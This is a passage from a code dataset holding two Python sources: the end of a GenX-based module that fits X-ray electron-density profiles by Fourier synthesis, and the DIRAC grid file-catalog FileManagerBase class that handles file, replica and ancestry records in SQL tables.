fit = func([x,ctrs], *popt)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
def find_A_P_muscovite(q_list,ctrs,amps,wids,wt=0.25):
#ctrs:z list (in A with reference of surface having 0A)
#amps:oc list
#wids:u list(in A)
Q=q_list
A_container,P_container=[],[]
for q_index in range(len(Q)):
q=Q[q_index]
complex_sum=0.+1.0J*0.
for i in range(len(ctrs)):
complex_sum+=wt*amps[i]*np.exp(-q**2*wids[i]**2/2)*np.exp(1.0J*q*ctrs[i])#z should be plus 1 to account for the fact that surface slab sitting on top of bulk slab
A_container.append(abs(complex_sum))
img_complex_sum, real_complex_sum=np.imag(complex_sum),np.real(complex_sum)
if img_complex_sum==0.:
P_container.append(0)
elif real_complex_sum==0 and img_complex_sum==1:
P_container.append(0.25)#1/2pi/2pi
elif real_complex_sum==0 and img_complex_sum==-1:
P_container.append(0.75)#3/2pi/2pi
else:#adjustment is needed since the return of np.arctan is ranging from -1/2pi to 1/2pi
if real_complex_sum>0 and img_complex_sum>0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.)
elif real_complex_sum>0 and img_complex_sum<0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+1.)
elif real_complex_sum<0 and img_complex_sum>0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+0.5)
elif real_complex_sum<0 and img_complex_sum<0:
P_container.append(np.arctan(img_complex_sum/real_complex_sum)/np.pi/2.+0.5)
return np.array(A_container),np.array(P_container),Q
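#Minimal usage sketch (hypothetical numbers, not fit results): a single Gaussian layer of
#occupancy 1 at z=2.5 A with width u=0.3 A evaluated on the specular rod. The amplitude
#A(q) should fall off as wt*exp(-q**2*u**2/2) and the phase P(q) equals q*z/(2*pi) wrapped into [0,1).
#q_demo = q_list_func([0]*5, [0]*5, [1, 2, 3, 4, 5])
#A_demo, P_demo, Q_demo = find_A_P_muscovite(q_demo, ctrs=[2.5], amps=[1.0], wids=[0.3])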
def fourier_synthesis(q_list,P,A,z,N=40,Auc=46.9275):
ZR=N
q_list.sort()
delta_q=np.average([q_list[i+1]-q_list[i] for i in range(len(q_list)-1)])
z_plot=z
eden_plot=[]
for i in range(len(z)):
z_each=z[i]
eden=0
eden=ZR/Auc/np.pi/2*np.sum(A*np.cos(2*np.pi*P-np.array(q_list)*z_each)*delta_q)
eden_plot.append(eden)
return eden_plot
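#Sanity note (restating the sum above): the synthesized profile is
#rho(z) = ZR/(Auc*2*pi) * sum_q A(q)*cos(2*pi*P(q) - q*z) * delta_q,
#i.e. a discretized inverse Fourier transform of the measured amplitudes A and phases P,
#normalized by ZR (=N) and the unit-cell area Auc (in A**2).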
def q_list_func(h, k, l,a=5.1988, b=9.0266, c=20.1058, alpha=90,beta=95.782,gamma=90):
'''Return the momentum transfer q = 2*pi/d_hkl (in 1/Angstrom) for the (h, k, l)
reflection of the given unit cell, where d_hkl is the lattice spacing.
'''
h=np.array(h)
k=np.array(k)
l=np.array(l)
alpha,beta,gamma=np.deg2rad(alpha),np.deg2rad(beta),np.deg2rad(gamma)
dinv = np.sqrt(((h/a*np.sin(alpha))**2 +
(k/b*np.sin(beta))**2 +
(l/c*np.sin(gamma))**2 +
2*k*l/b/c*(np.cos(beta)*
np.cos(gamma) -
np.cos(alpha)) +
2*l*h/c/a*(np.cos(gamma)*
np.cos(alpha) -
np.cos(beta)) +
2*h*k/a/b*(np.cos(alpha)*
np.cos(beta) -
np.cos(gamma)))
/(1 - np.cos(alpha)**2 - np.cos(beta)**2
- np.cos(gamma)**2 + 2*np.cos(alpha)
*np.cos(beta)*np.cos(gamma)))
return dinv*np.pi*2
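#Quick check (using the default cell parameters only): for the specular (0,0,L) rod the
#expression above reduces to q = 2*pi*L/(c*sin(beta)), so q(0,0,1) is ~0.314 1/A
#for the default c=20.1058 A and beta=95.782 deg.
#q_specular = q_list_func([0, 0], [0, 0], [1, 2])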
def fit_e_density(path=module_path_locator(),fit_range=[1,40],zs=None,N=8):
PATH=path
##extract hkl values##
full_dataset=np.loadtxt(os.path.join(PATH,"temp_full_dataset.dat"))
h,k,l=[],[],[]
for i in range(len(full_dataset)):
if full_dataset[i,3]!=0:
if full_dataset[i,3] not in l:
h.append(full_dataset[i,1])
k.append(full_dataset[i,2])
l.append(full_dataset[i,3])
##extract e density data##
data_file=os.path.join(PATH,"temp_plot_eden_fourier_synthesis")
data=np.append([pickle.load(open(data_file,"rb"))[0]],[pickle.load(open(data_file,"rb"))[1]],axis=0).transpose()
##extract water scaling value##
water_scaling_file=os.path.join(PATH,"water_scaling")
water_scaling=pickle.load(open(water_scaling_file,"rb"))[-1]
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
#cal q list
q_list=q_list_func(h,k,l)
def func(x_ctrs_qs,*params):
x=x_ctrs_qs[0]
ctrs=x_ctrs_qs[1]
q_list=x_ctrs_qs[2]
amps=[]
wids=[]
for i in range(0, len(params), 2):
amps.append(abs(params[i]))
wids.append(abs(params[i+1]))
#cal A and P list
A,P,Q=find_A_P_muscovite(q_list,ctrs,amps,wids)
#Fourier synthesis
y=fourier_synthesis(q_list,P,A,z=x,N=40)
return y
guess = []
ctrs=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
guess += [0.5, 1]
#print x,ctrs
popt, pcov = curve_fit(func, [x,ctrs,q_list], y, p0=guess)
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),2):
combinded_set=combinded_set+[ctrs[i/2],abs(popt[i])*4,abs(popt[i+1])**2]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
#combinded_set=combinded_set.transpose()
print 'total_occupancy=',np.sum(combinded_set[1,:]/4)
print 'OC_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'U_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
print 'X_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
fit = func([x,ctrs,q_list], *popt)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
if __name__=="__main__":
plot_all(make_offset_of_total_e=False)
|
jackey-qiu/genx_pc_qiu
|
supportive_functions/create_plots.py
|
Python
|
gpl-3.0
| 99,040
|
[
"Gaussian",
"VTK"
] |
49999d1b0bdff355d1991dddd25b058c8fc813bb39c6ef193548e852e855fe0f
|
""" FileManagerBase is a base class for all the specific File Managers
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
# pylint: disable=protected-access
import six
import os
import stat
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.List import intListToString
from DIRAC.Core.Utilities.Pfn import pfnunparse
class FileManagerBase(object):
""" Base class for all the specific File Managers
"""
def __init__(self, database=None):
self.db = database
self.statusDict = {}
def _getConnection(self, connection):
if connection:
return connection
res = self.db._getConnection()
if res['OK']:
return res['Value']
gLogger.warn("Failed to get MySQL connection", res['Message'])
return connection
def setDatabase(self, database):
self.db = database
def getFileCounters(self, connection=False):
""" Get a number of counters to verify the sanity of the Files in the catalog
"""
connection = self._getConnection(connection)
resultDict = {}
req = "SELECT COUNT(*) FROM FC_Files;"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Files'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_Files WHERE FileID NOT IN ( SELECT FileID FROM FC_Replicas )"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Files w/o Replicas'] = res['Value'][0][0]
req = "SELECT COUNT(RepID) FROM FC_Replicas WHERE FileID NOT IN ( SELECT FileID FROM FC_Files )"
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Replicas w/o Files'] = res['Value'][0][0]
treeTable = self.db.dtree.getTreeTable()
req = "SELECT COUNT(FileID) FROM FC_Files WHERE DirID NOT IN ( SELECT DirID FROM %s)" % treeTable
res = self.db._query(req, connection)
if not res['OK']:
return res
resultDict['Orphan Files'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_Files WHERE FileID NOT IN ( SELECT FileID FROM FC_FileInfo)"
res = self.db._query(req, connection)
if not res['OK']:
resultDict['Files w/o FileInfo'] = 0
else:
resultDict['Files w/o FileInfo'] = res['Value'][0][0]
req = "SELECT COUNT(FileID) FROM FC_FileInfo WHERE FileID NOT IN ( SELECT FileID FROM FC_Files)"
res = self.db._query(req, connection)
if not res['OK']:
resultDict['FileInfo w/o Files'] = 0
else:
resultDict['FileInfo w/o Files'] = res['Value'][0][0]
return S_OK(resultDict)
def getReplicaCounters(self, connection=False):
""" Get a number of counters to verify the sanity of the Replicas in the catalog
"""
connection = self._getConnection(connection)
req = "SELECT COUNT(*) FROM FC_Replicas;"
res = self.db._query(req, connection)
if not res['OK']:
return res
return S_OK({'Replicas': res['Value'][0][0]})
######################################################
#
# File write methods
#
def _insertFiles(self, lfns, uid, gid, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _deleteFiles(self, toPurge, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _insertReplicas(self, lfns, master=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _findFiles(self, lfns, metadata=["FileID"], allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getFileReplicas(self, fileIDs, fields_input=['PFN'], allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getFileIDFromGUID(self, guid, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def getLFNForGUID(self, guids, connection=False):
"""Returns the LFN matching a given GUID
"""
return S_ERROR("To be implemented on derived class")
def _setFileParameter(self, fileID, paramName, paramValue, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _deleteReplicas(self, lfns, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _setReplicaStatus(self, fileID, se, status, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _setReplicaHost(self, fileID, se, newSE, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryFiles(self, dirID, fileNames, metadata, allStatus=False, connection=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryFileIDs(self, dirID, requestString=False):
"""To be implemented on derived class
"""
return S_ERROR("To be implemented on derived class")
def _findFileIDs(self, lfns, connection=False):
""" To be implemented on derived class
Should return following the successful/failed convention
Successful is a dictionary with keys the lfn, and values the FileID"""
return S_ERROR("To be implemented on derived class")
def _getDirectoryReplicas(self, dirID, allStatus=False, connection=False):
""" To be implemented on derived class
Should return with only one value, being a list of all the replicas (FileName,FileID,SEID,PFN)
"""
return S_ERROR("To be implemented on derived class")
def countFilesInDir(self, dirId):
""" Count how many files there is in a given Directory
:param int dirID: directory id
:returns: S_OK(value) or S_ERROR
"""
return S_ERROR("To be implemented on derived class")
def _getFileLFNs(self, fileIDs):
""" Get the file LFNs for a given list of file IDs
"""
stringIDs = intListToString(fileIDs)
treeTable = self.db.dtree.getTreeTable()
req = "SELECT F.FileID, CONCAT(D.DirName,'/',F.FileName) from FC_Files as F,\
%s as D WHERE F.FileID IN ( %s ) AND F.DirID=D.DirID" % (
treeTable, stringIDs)
result = self.db._query(req)
if not result['OK']:
return result
fileNameDict = {}
for row in result['Value']:
fileNameDict[row[0]] = row[1]
failed = {}
successful = fileNameDict
if len(fileNameDict) != len(fileIDs):
for id_ in fileIDs:
if id_ not in fileNameDict:
failed[id_] = "File ID not found"
return S_OK({'Successful': successful, 'Failed': failed})
def addFile(self, lfns, credDict, connection=False):
""" Add files to the catalog
:param dict lfns: dict{ lfn : info}. 'info' is a dict containing PFN, SE, Size and Checksum
the SE parameter can be a list if we have several replicas to register
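A hedged example of the expected structure (the SE name, path and values below are
illustrative only, not real catalog entries):
{'/vo/user/some_file.dat': {'PFN': 'srm://some.se.example/vo/user/some_file.dat',
'SE': 'SOME-SE-disk', 'Size': 1024, 'Checksum': '0a1b2c3d'}}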
"""
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['PFN', 'SE', 'Size', 'Checksum'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._addFiles(lfns, credDict, connection=connection)
if not res['OK']:
for lfn in lfns.keys():
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def _addFiles(self, lfns, credDict, connection=False):
""" Main file adding method
"""
connection = self._getConnection(connection)
successful = {}
result = self.db.ugManager.getUserAndGroupID(credDict)
if not result['OK']:
return result
uid, gid = result['Value']
# prepare lfns with master replicas - the first in the list or a unique replica
masterLfns = {}
extraLfns = {}
for lfn in lfns:
masterLfns[lfn] = dict(lfns[lfn])
if isinstance(lfns[lfn].get('SE'), list):
masterLfns[lfn]['SE'] = lfns[lfn]['SE'][0]
if len(lfns[lfn]['SE']) > 1:
extraLfns[lfn] = dict(lfns[lfn])
extraLfns[lfn]['SE'] = lfns[lfn]['SE'][1:]
# Check whether the supplied files have been registered already
res = self._getExistingMetadata(list(masterLfns), connection=connection)
if not res['OK']:
return res
existingMetadata, failed = res['Value']
if existingMetadata:
success, fail = self._checkExistingMetadata(existingMetadata, masterLfns)
successful.update(success)
failed.update(fail)
for lfn in list(success) + list(fail):
masterLfns.pop(lfn)
# If GUIDs are supposed to be unique check their pre-existance
if self.db.uniqueGUID:
fail = self._checkUniqueGUID(masterLfns, connection=connection)
failed.update(fail)
for lfn in fail:
masterLfns.pop(lfn)
# If we have files left to register
if masterLfns:
# Create the directories for the supplied files and store their IDs
directories = self._getFileDirectories(list(masterLfns))
for directory, fileNames in directories.items():
res = self.db.dtree.makeDirectories(directory, credDict)
if not res['OK']:
for fileName in fileNames:
lfn = os.path.join(directory, fileName)
failed[lfn] = res['Message']
masterLfns.pop(lfn)
continue
for fileName in fileNames:
if not fileName:
failed[directory] = "Is no a valid file"
masterLfns.pop(directory)
continue
lfn = "%s/%s" % (directory, fileName)
lfn = lfn.replace('//', '/')
# This condition should never be true, we would not be here otherwise...
if not res['OK']:
failed[lfn] = "Failed to create directory for file"
masterLfns.pop(lfn)
else:
masterLfns[lfn]['DirID'] = res['Value']
# If we still have files left to register
if masterLfns:
res = self._insertFiles(masterLfns, uid, gid, connection=connection)
if not res['OK']:
for lfn in list(masterLfns): # pylint: disable=consider-iterating-dictionary
failed[lfn] = res['Message']
masterLfns.pop(lfn)
else:
for lfn, error in res['Value']['Failed'].items():
failed[lfn] = error
masterLfns.pop(lfn)
masterLfns = res['Value']['Successful']
# Add the ancestors
if masterLfns:
res = self._populateFileAncestors(masterLfns, connection=connection)
toPurge = []
if not res['OK']:
for lfn in masterLfns.keys():
failed[lfn] = "Failed while registering ancestors"
toPurge.append(masterLfns[lfn]['FileID'])
else:
failed.update(res['Value']['Failed'])
for lfn, error in res['Value']['Failed'].items():
toPurge.append(masterLfns[lfn]['FileID'])
if toPurge:
self._deleteFiles(toPurge, connection=connection)
# Register the replicas
newlyRegistered = {}
if masterLfns:
res = self._insertReplicas(masterLfns, master=True, connection=connection)
toPurge = []
if not res['OK']:
for lfn in masterLfns.keys():
failed[lfn] = "Failed while registering replica"
toPurge.append(masterLfns[lfn]['FileID'])
else:
newlyRegistered = res['Value']['Successful']
successful.update(newlyRegistered)
failed.update(res['Value']['Failed'])
for lfn, error in res['Value']['Failed'].items():
toPurge.append(masterLfns[lfn]['FileID'])
if toPurge:
self._deleteFiles(toPurge, connection=connection)
# Add extra replicas for successfully registered LFNs
for lfn in list(extraLfns):
if lfn not in successful:
extraLfns.pop(lfn)
if extraLfns:
res = self._findFiles(list(extraLfns), ['FileID', 'DirID'], connection=connection)
if not res['OK']:
for lfn in list(lfns):
failed[lfn] = 'Failed while registering extra replicas'
successful.pop(lfn)
extraLfns.pop(lfn)
else:
failed.update(res['Value']['Failed'])
for lfn in res['Value']['Failed']:
successful.pop(lfn)
extraLfns.pop(lfn)
for lfn, fileDict in res['Value']['Successful'].items():
extraLfns[lfn]['FileID'] = fileDict['FileID']
extraLfns[lfn]['DirID'] = fileDict['DirID']
if extraLfns:
res = self._insertReplicas(extraLfns, master=False, connection=connection)
if not res['OK']:
for lfn in extraLfns: # pylint: disable=consider-iterating-dictionary
failed[lfn] = "Failed while registering extra replicas"
successful.pop(lfn)
else:
newlyRegistered = res['Value']['Successful']
successful.update(newlyRegistered)
failed.update(res['Value']['Failed'])
return S_OK({'Successful': successful, 'Failed': failed})
def _updateDirectoryUsage(self, directorySEDict, change, connection=False):
connection = self._getConnection(connection)
for directoryID in directorySEDict.keys():
result = self.db.dtree.getPathIDsByID(directoryID)
if not result['OK']:
return result
parentIDs = result['Value']
dirDict = directorySEDict[directoryID]
for seID in dirDict.keys():
seDict = dirDict[seID]
files = seDict['Files']
size = seDict['Size']
insertTuples = []
for dirID in parentIDs:
insertTuples.append('(%d,%d,%d,%d,UTC_TIMESTAMP())' % (dirID, seID, size, files))
req = "INSERT INTO FC_DirectoryUsage (DirID,SEID,SESize,SEFiles,LastUpdate) "
req += "VALUES %s" % ','.join(insertTuples)
req += " ON DUPLICATE KEY UPDATE SESize=SESize%s%d, SEFiles=SEFiles%s%d, LastUpdate=UTC_TIMESTAMP() " \
% (change, size, change, files)
res = self.db._update(req)
if not res['OK']:
gLogger.warn("Failed to update FC_DirectoryUsage", res['Message'])
return S_OK()
def _populateFileAncestors(self, lfns, connection=False):
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, lfnDict in lfns.items():
originalFileID = lfnDict['FileID']
originalDepth = lfnDict.get('AncestorDepth', 1)
ancestors = lfnDict.get('Ancestors', [])
if isinstance(ancestors, six.string_types):
ancestors = [ancestors]
if lfn in ancestors:
ancestors.remove(lfn)
if not ancestors:
successful[lfn] = True
continue
res = self._findFiles(ancestors, connection=connection)
if res['Value']['Failed']:
failed[lfn] = "Failed to resolve ancestor files"
continue
ancestorIDs = res['Value']['Successful']
fileIDLFNs = {}
toInsert = {}
for ancestor in ancestorIDs.keys():
fileIDLFNs[ancestorIDs[ancestor]['FileID']] = ancestor
toInsert[ancestorIDs[ancestor]['FileID']] = originalDepth
res = self._getFileAncestors(list(fileIDLFNs))
if not res['OK']:
failed[lfn] = "Failed to obtain all ancestors"
continue
fileIDAncestorDict = res['Value']
for fileIDDict in fileIDAncestorDict.values():
for ancestorID, relativeDepth in fileIDDict.items():
toInsert[ancestorID] = relativeDepth + originalDepth
res = self._insertFileAncestors(originalFileID, toInsert, connection=connection)
if not res['OK']:
if "Duplicate" in res['Message']:
failed[lfn] = "Failed to insert ancestor files: duplicate entry"
else:
failed[lfn] = "Failed to insert ancestor files"
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
def _insertFileAncestors(self, fileID, ancestorDict, connection=False):
connection = self._getConnection(connection)
ancestorTuples = []
for ancestorID, depth in ancestorDict.items():
ancestorTuples.append("(%d,%d,%d)" % (fileID, ancestorID, depth))
if not ancestorTuples:
return S_OK()
req = "INSERT INTO FC_FileAncestors (FileID, AncestorID, AncestorDepth) VALUES %s" \
% intListToString(ancestorTuples)
return self.db._update(req, connection)
def _getFileAncestors(self, fileIDs, depths=[], connection=False):
connection = self._getConnection(connection)
req = "SELECT FileID, AncestorID, AncestorDepth FROM FC_FileAncestors WHERE FileID IN (%s)" \
% intListToString(fileIDs)
if depths:
req = "%s AND AncestorDepth IN (%s);" % (req, intListToString(depths))
res = self.db._query(req, connection)
if not res['OK']:
return res
fileIDAncestors = {}
for fileID, ancestorID, depth in res['Value']:
if fileID not in fileIDAncestors:
fileIDAncestors[fileID] = {}
fileIDAncestors[fileID][ancestorID] = depth
return S_OK(fileIDAncestors)
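# Returned mapping shape (illustrative IDs): {42: {7: 1, 3: 2}} means file 42 has
# ancestor 7 one generation up and ancestor 3 two generations up.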
def _getFileDescendents(self, fileIDs, depths, connection=False):
connection = self._getConnection(connection)
req = "SELECT AncestorID, FileID, AncestorDepth FROM FC_FileAncestors WHERE AncestorID IN (%s)" \
% intListToString(fileIDs)
if depths:
req = "%s AND AncestorDepth IN (%s);" % (req, intListToString(depths))
res = self.db._query(req, connection)
if not res['OK']:
return res
fileIDAncestors = {}
for ancestorID, fileID, depth in res['Value']:
if ancestorID not in fileIDAncestors:
fileIDAncestors[ancestorID] = {}
fileIDAncestors[ancestorID][fileID] = depth
return S_OK(fileIDAncestors)
def addFileAncestors(self, lfns, connection=False):
""" Add file ancestors to the catalog """
connection = self._getConnection(connection)
failed = {}
successful = {}
result = self._findFiles(list(lfns), connection=connection)
if not result['OK']:
return result
if result['Value']['Failed']:
failed.update(result['Value']['Failed'])
for lfn in result['Value']['Failed']:
lfns.pop(lfn)
if not lfns:
return S_OK({'Successful': successful, 'Failed': failed})
for lfn in result['Value']['Successful']:
lfns[lfn]['FileID'] = result['Value']['Successful'][lfn]['FileID']
result = self._populateFileAncestors(lfns, connection)
if not result['OK']:
return result
failed.update(result['Value']['Failed'])
successful = result['Value']['Successful']
return S_OK({'Successful': successful, 'Failed': failed})
def _getFileRelatives(self, lfns, depths, relation, connection=False):
connection = self._getConnection(connection)
failed = {}
successful = {}
result = self._findFiles(list(lfns), connection=connection)
if not result['OK']:
return result
if result['Value']['Failed']:
failed.update(result['Value']['Failed'])
for lfn in result['Value']['Failed']:
lfns.pop(lfn)
if not lfns:
return S_OK({'Successful': successful, 'Failed': failed})
inputIDDict = {}
for lfn in result['Value']['Successful']:
inputIDDict[result['Value']['Successful'][lfn]['FileID']] = lfn
inputIDs = list(inputIDDict)
if relation == 'ancestor':
result = self._getFileAncestors(inputIDs, depths, connection)
else:
result = self._getFileDescendents(inputIDs, depths, connection)
if not result['OK']:
return result
failed = {}
successful = {}
relDict = result['Value']
for id_ in inputIDs:
if id_ in relDict:
result = self._getFileLFNs(list(relDict[id_]))
if not result['OK']:
failed[inputIDDict[id_]] = "Failed to find %s" % relation
else:
if result['Value']['Successful']:
resDict = {}
for aID in result['Value']['Successful']:
resDict[result['Value']['Successful'][aID]] = relDict[id_][aID]
successful[inputIDDict[id_]] = resDict
for aID in result['Value']['Failed']:
failed[inputIDDict[id_]] = "Failed to get the ancestor LFN"
else:
successful[inputIDDict[id_]] = {}
return S_OK({'Successful': successful, 'Failed': failed})
def getFileAncestors(self, lfns, depths, connection=False):
return self._getFileRelatives(lfns, depths, 'ancestor', connection)
def getFileDescendents(self, lfns, depths, connection=False):
return self._getFileRelatives(lfns, depths, 'descendent', connection)
def _getExistingMetadata(self, lfns, connection=False):
connection = self._getConnection(connection)
# Check whether the files already exist before adding
res = self._findFiles(lfns, ['FileID', 'Size', 'Checksum', 'GUID'], connection=connection)
if not res['OK']:
return res
successful = res['Value']['Successful']
failed = res['Value']['Failed']
for lfn, error in list(failed.items()):
if error == 'No such file or directory':
failed.pop(lfn)
return S_OK((successful, failed))
def _checkExistingMetadata(self, existingLfns, lfns):
failed = {}
successful = {}
fileIDLFNs = {}
for lfn, fileDict in existingLfns.items():
fileIDLFNs[fileDict['FileID']] = lfn
# For those that exist get the replicas to determine whether they are already registered
res = self._getFileReplicas(list(fileIDLFNs))
if not res['OK']:
for lfn in fileIDLFNs.values():
failed[lfn] = 'Failed checking pre-existing replicas'
else:
replicaDict = res['Value']
for fileID, lfn in fileIDLFNs.items():
fileMetadata = existingLfns[lfn]
existingGuid = fileMetadata['GUID']
existingSize = fileMetadata['Size']
existingChecksum = fileMetadata['Checksum']
newGuid = lfns[lfn]['GUID']
newSize = lfns[lfn]['Size']
newChecksum = lfns[lfn]['Checksum']
# Ensure that the key file metadata is the same
if (existingGuid != newGuid) or \
(existingSize != newSize) or \
(existingChecksum != newChecksum):
failed[lfn] = "File already registered with alternative metadata"
# If the DB does not have replicas for this file return an error
elif fileID not in replicaDict or not replicaDict[fileID]:
failed[lfn] = "File already registered with no replicas"
# If the supplied SE is not in the existing replicas return an error
elif not lfns[lfn]['SE'] in replicaDict[fileID].keys():
failed[lfn] = "File already registered with alternative replicas"
# If we get here the file being registered already exists exactly in the DB
else:
successful[lfn] = True
return successful, failed
def _checkUniqueGUID(self, lfns, connection=False):
connection = self._getConnection(connection)
guidLFNs = {}
failed = {}
for lfn, fileDict in lfns.items():
guidLFNs[fileDict['GUID']] = lfn
res = self._getFileIDFromGUID(list(guidLFNs), connection=connection)
if not res['OK']:
return dict.fromkeys(lfns, res['Message'])
for guid, fileID in res['Value'].items():
# resolve this to LFN
failed[guidLFNs[guid]] = "GUID already registered for another file %s" % fileID
return failed
def removeFile(self, lfns, connection=False):
""" Remove file from the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
res = self._findFiles(lfns, ['DirID', 'FileID', 'Size'], connection=connection)
if not res['OK']:
return res
for lfn, error in res['Value']['Failed'].items():
if error == 'No such file or directory':
successful[lfn] = True
else:
failed[lfn] = error
fileIDLfns = {}
lfns = res['Value']['Successful']
for lfn, lfnDict in lfns.items():
fileIDLfns[lfnDict['FileID']] = lfn
res = self._computeStorageUsageOnRemoveFile(lfns, connection=connection)
if not res['OK']:
return res
directorySESizeDict = res['Value']
# Now do removal
res = self._deleteFiles(list(fileIDLfns), connection=connection)
if not res['OK']:
for lfn in fileIDLfns.values():
failed[lfn] = res['Message']
else:
# Update the directory usage
self._updateDirectoryUsage(directorySESizeDict, '-', connection=connection)
for lfn in fileIDLfns.values():
successful[lfn] = True
return S_OK({"Successful": successful, "Failed": failed})
def _computeStorageUsageOnRemoveFile(self, lfns, connection=False):
# Resolve the replicas to calculate reduction in storage usage
fileIDLfns = {}
for lfn, lfnDict in lfns.items():
fileIDLfns[lfnDict['FileID']] = lfn
res = self._getFileReplicas(list(fileIDLfns), connection=connection)
if not res['OK']:
return res
directorySESizeDict = {}
for fileID, seDict in res['Value'].items():
dirID = lfns[fileIDLfns[fileID]]['DirID']
size = lfns[fileIDLfns[fileID]]['Size']
directorySESizeDict.setdefault(dirID, {})
directorySESizeDict[dirID].setdefault(0, {'Files': 0, 'Size': 0})
directorySESizeDict[dirID][0]['Size'] += size
directorySESizeDict[dirID][0]['Files'] += 1
for seName in seDict.keys():
res = self.db.seManager.findSE(seName)
if not res['OK']:
return res
seID = res['Value']
size = lfns[fileIDLfns[fileID]]['Size']
directorySESizeDict[dirID].setdefault(seID, {'Files': 0, 'Size': 0})
directorySESizeDict[dirID][seID]['Size'] += size
directorySESizeDict[dirID][seID]['Files'] += 1
return S_OK(directorySESizeDict)
def setFileStatus(self, lfns, connection=False):
""" Get set the group for the supplied files """
connection = self._getConnection(connection)
res = self._findFiles(lfns, ['FileID', 'UID'], connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
for lfn in res['Value']['Successful']:
status = lfns[lfn]
if isinstance(status, six.string_types):
if status not in self.db.validFileStatus:
failed[lfn] = 'Invalid file status %s' % status
continue
result = self._getStatusInt(status, connection=connection)
if not result['OK']:
failed[lfn] = res['Message']
continue
status = result['Value']
fileID = res['Value']['Successful'][lfn]['FileID']
res = self._setFileParameter(fileID, "Status", status, connection=connection)
if not res['OK']:
failed[lfn] = res['Message']
else:
successful[lfn] = True
return S_OK({'Successful': successful, 'Failed': failed})
######################################################
#
# Replica write methods
#
def addReplica(self, lfns, connection=False):
""" Add replica to the catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['PFN', 'SE'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._addReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns:
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def _addReplicas(self, lfns, connection=False):
connection = self._getConnection(connection)
successful = {}
res = self._findFiles(list(lfns), ['DirID', 'FileID', 'Size'], connection=connection)
if not res['OK']:
return res
failed = res['Value']['Failed']
for lfn in failed:
lfns.pop(lfn)
lfnFileIDDict = res['Value']['Successful']
for lfn, fileDict in lfnFileIDDict.items():
lfns[lfn].update(fileDict)
res = self._insertReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns:
failed[lfn] = res['Message']
else:
successful = res['Value']['Successful']
failed.update(res['Value']['Failed'])
return S_OK({'Successful': successful, 'Failed': failed})
def removeReplica(self, lfns, connection=False):
""" Remove replica from catalog """
connection = self._getConnection(connection)
successful = {}
failed = {}
for lfn, info in list(lfns.items()):
res = self._checkInfo(info, ['SE'])
if not res['OK']:
failed[lfn] = res['Message']
lfns.pop(lfn)
res = self._deleteReplicas(lfns, connection=connection)
if not res['OK']:
for lfn in lfns.keys():
failed[lfn] = res['Message']
else:
failed.update(res['Value']['Failed'])
successful.update(res['Value']['Successful'])
